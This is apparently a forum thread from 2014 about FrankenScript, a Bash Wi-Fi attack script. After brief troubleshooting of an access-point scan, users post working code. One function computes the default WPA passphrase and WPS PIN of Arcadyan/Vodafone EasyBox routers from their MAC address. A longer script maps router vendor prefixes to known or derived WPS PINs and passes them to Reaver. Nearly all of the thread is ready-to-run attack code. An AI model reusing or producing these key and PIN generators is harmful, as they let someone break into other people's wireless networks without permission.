'Scan for possible targets.
Once you've identified a target press Ctrl-C to exit the scan and to continue.
Press [Enter] to start the scan.
(I pressed enter)
Please choose an AP
(nothing but blank space)
Please input the number of your chosen target:'
Where are the choices of an AP supposed to appear?
The choices should appear just above "Please input the number of your chosen target".
Try what flyinghaggis suggested, if that doesn't work look in the FrankenScript temp folder and delete anything that might be in there.
Did wash display any access points?
Did you select your WiFi device?
Did you enable attack mode?
Did you receive any error messages?
Last edited by slim76; 2014-01-17 at 22:56.
I made an update of wpspin and I implemented the corrected algorithm in bash in a function called ARCADYAN
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables
You "feed it" with $BSSID which is the MAC address of the target in original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING which are the 7 numbers of the PIN
then it calls $CHECKSUM that you already have implemented in your script to generate the full PIN (variable $PIN )
Code:
ARCADYAN(){
  # WPSPIN 1.5 - GPL v 3 by kcdtv
  # This function uses three amazing works
  # 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
  # 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
  # 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
  #
  # Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
  # This function is based on the script easybox_keygen.sh previously mentioned
  #
  # The quotation from the original work start with double dash and are between quotes
  # Some variables and line are changed for a better integration and I add the PIN calculation and Coeman trick for default WPA
  # the lines quoted with six dash and "unchanged" are exactly the same than in easybox_keygen like this "######unchanged"
  # This function requires $BSSID which is the mac address ( hex may format XX:XX:XX:XX:XX:XX)
  # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digit of our PIN, ready to use in CHECKSUM to
  # give the full WPS PIN ($PIN)

  ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
  deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
  # suppression of $take5 and $last4 compared with easybox code, the job is directly done in the array value assignation,
  # also the variable $MAC has been replaced by $BSSID that is used in WPSPIN

  ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
  hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))                                   ######unchanged

  ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
  ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
  c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})      ######unchanged
  c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})      ######unchanged
  K1=$((($c1)%16))                                                                      ######unchanged
  K2=$((($c2)%16))                                                                      ######unchanged
  X1=$((K1^${deci[3]}))                                                                 ######unchanged
  X2=$((K1^${deci[2]}))                                                                 ######unchanged
  X3=$((K1^${deci[1]}))                                                                 ######unchanged
  Y1=$((K2^0x${hexi[1]}))                                                               ######unchanged
  Y2=$((K2^0x${hexi[2]}))                                                               ######unchanged
  Y3=$((K2^0x${hexi[3]}))                                                               ######unchanged
  Z1=$((0x${hexi[2]}^${deci[3]}))                                                       ######unchanged
  Z2=$((0x${hexi[3]}^${deci[2]}))                                                       ######unchanged
  Z3=$((K1^K2))                                                                         ######unchanged

  STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)  # this to generate later our PIN, the 7 first digit
  DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1)
  # the change respected to the original script in the most important thing, the default pass, is the adaptation of
  # Coeman76's work on spanish vodafone where he found out that no 0 where used in the final pass
  CHECKSUM
}
I put you back CHECKSUM in case it helps you
Code:
CHECKSUM(){                                                            # The function checksum was written for bash by antares_145 from crack-wifi.com
  PIN=`expr 10 '*' $STRING`                                            # We will have to define first the string $STRING (the 7 first number of the WPS PIN)
  ACCUM=0                                                              # to get a result using this function)
  ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`   # multiplying the first number by 3, the second by 1, the third by 3 etc....
  ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
  ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
  ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
  ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
  ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
  ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`         # so we follow the pattern for our seven number
  DIGIT=`expr $ACCUM '%' 10`                                           # we define our digit control: the sum reduced with base 10 to the unit number
  CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`                         # the checksum is equal to " 10 minus digit control "
  PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`)                     # Some zero-padding in case that the value of the PIN is under 10000000
}                                                                      # STRING + CHECKSUM gives the full WPS PIN
feel free to use the code and if you have any question about it do not hesitate to ask
cheers
Nice work matey.
I know you said feel free to ask any questions, but I was wondering if I could go a step further and ask if you would be able to correct the script for me please. :-)
I'm sorry to ask, I'm still very new to this sort of thing. LOL
If you can, please feel free to add any credits or such.
Code:
#!/bin/bash
#
#
#
#####################################################################
AP_essid=$(cat $HOME/FrankenScript/Scripts/AP_essid.txt)
AP_bssid=$(cat $HOME/FrankenScript/Scripts/AP_bssid.txt)
ESSID=$(echo $AP_essid)
BSSID=$(echo $AP_bssid)
#####################################################################

FUNC_CHECKSUM(){
ACCUM=0
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
DIGIT=`expr $ACCUM '%' 10`
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
PIN=`expr $PIN '+' $CHECKSUM`
ACCUM=0
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
RESTE=`expr $ACCUM '%' 10`
}

CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
MAC=$(echo $FINBSSID | tr -d ':')
CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
FINESSID=$(echo $ESSID | cut -d '-' -f2)
PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
MACESSID=$(echo $PAREMAC$FINESSID)
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PINWPS1=$(printf '%08d\n' $PIN)
STRING2=`expr $STRING '+' 8`
PIN=`expr 10 '*' $STRING2`
FUNC_CHECKSUM
PINWPS2=$(printf '%08d\n' $PIN)
STRING3=`expr $STRING '+' 14`
PIN=`expr 10 '*' $STRING3`
FUNC_CHECKSUM
PINWPS3=$(printf '%08d\n' $PIN)

if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&
   [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&
   [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
then
CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
STRING4=`expr $RAIZ '+' 7`
PIN=`expr 10 '*' $STRING4`
FUNC_CHECKSUM
PINWPS4=$(printf '%08d\n' $PIN)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
PIN4REAVER=$PINWPS4
else
case $CHECKBSSID in
04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 $RED"Other Possible Pin"$RED:$STAND $PINWPS2 $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
PIN4REAVER=$PINWPS1
;;
001915)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
404A03)
echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
PIN4REAVER=11866428
;;
F43E61 | 001FA4)
echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
PIN4REAVER=12345670
;;
001A2B)
if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
PIN4REAVER=88478760
else
echo -e "PIN POSSIBLE... > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
3872C0)
if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
then
echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
PIN4REAVER=18836486
else
echo -e "PIN POSSIBLE > $PINWPS1"
PIN4REAVER=$PINWPS1
fi
;;
FCF528)
echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
PIN4REAVER=20329761
;;
3039F2)
echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
A4526F)
echo -e "several possible PINs, ranked in order> 16538061 88202907 73767053 16702738 43297917 18355604 "
PIN4REAVER=16538061
;;
74888B)
echo -e "several possible PINs, ranked in order> 43297917 73767053 88202907 16538061 16702738 18355604"
PIN4REAVER=43297917
;;
DC0B1A)
echo -e "several possible PINs, ranked in order> 16538061 16702738 18355604 88202907 73767053 43297917"
PIN4REAVER=16538061
;;
5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
PIN4REAVER=$PINWPS1
;;
002275)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
08863B)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
001CDF)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
00A026)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
5057F0)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
C83A35 | 00B00C | 081075)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
E47CF9 | 801F02)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
0022F7)
echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
PIN4REAVER=$PINWPS1
;;
*)
PIN4REAVER=$PINWPS1
;;
esac
fi
Last edited by slim76; 2014-01-30 at 03:09.
you should collect the arcadyan mac to redact your case in condition
where you have the X you put the 6 first digits of the arcadyan mac without the 2 points
Code:
;;
XXXXXX | XXXXXX)
and then you generate string
Code:
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
then you generate the checksum to get the full PIN
Code:
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)
that will give you
Code:
;;
XXXXXX | XXXXXX)
deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g'))
c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]})
c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]})
K1=$((($c1)%16))
K2=$((($c2)%16))
X1=$((K1^${deci[3]}))
X2=$((K1^${deci[2]}))
X3=$((K1^${deci[1]}))
Y1=$((K2^0x${hexi[1]}))
Y2=$((K2^0x${hexi[2]}))
Y3=$((K2^0x${hexi[3]}))
Z1=$((0x${hexi[2]}^${deci[3]}))
Z2=$((0x${hexi[3]}^${deci[2]}))
Z3=$((K1^K2))
STRING=$(printf '%08d\n' `echo $((0x$X1$X2$Y1$Y2$Z1$Z2$X3))` | rev | cut -c -7 | rev)
PIN=`expr 10 '*' $STRING`
FUNC_CHECKSUM
PIN4REAVER=$(printf '%08d\n' $PIN)
that you have to place in your case esac sentence, anywhere until it is before
Code:
;;
*)
Sorry mate, I meant would you be able to amend the script I posted so I only have to paste it back into FrankenScript.
I know it's kinda cheeky to ask, sorry. :-)
I've been in stupid mode for the last few days and I'm having trouble following even simple things. LOL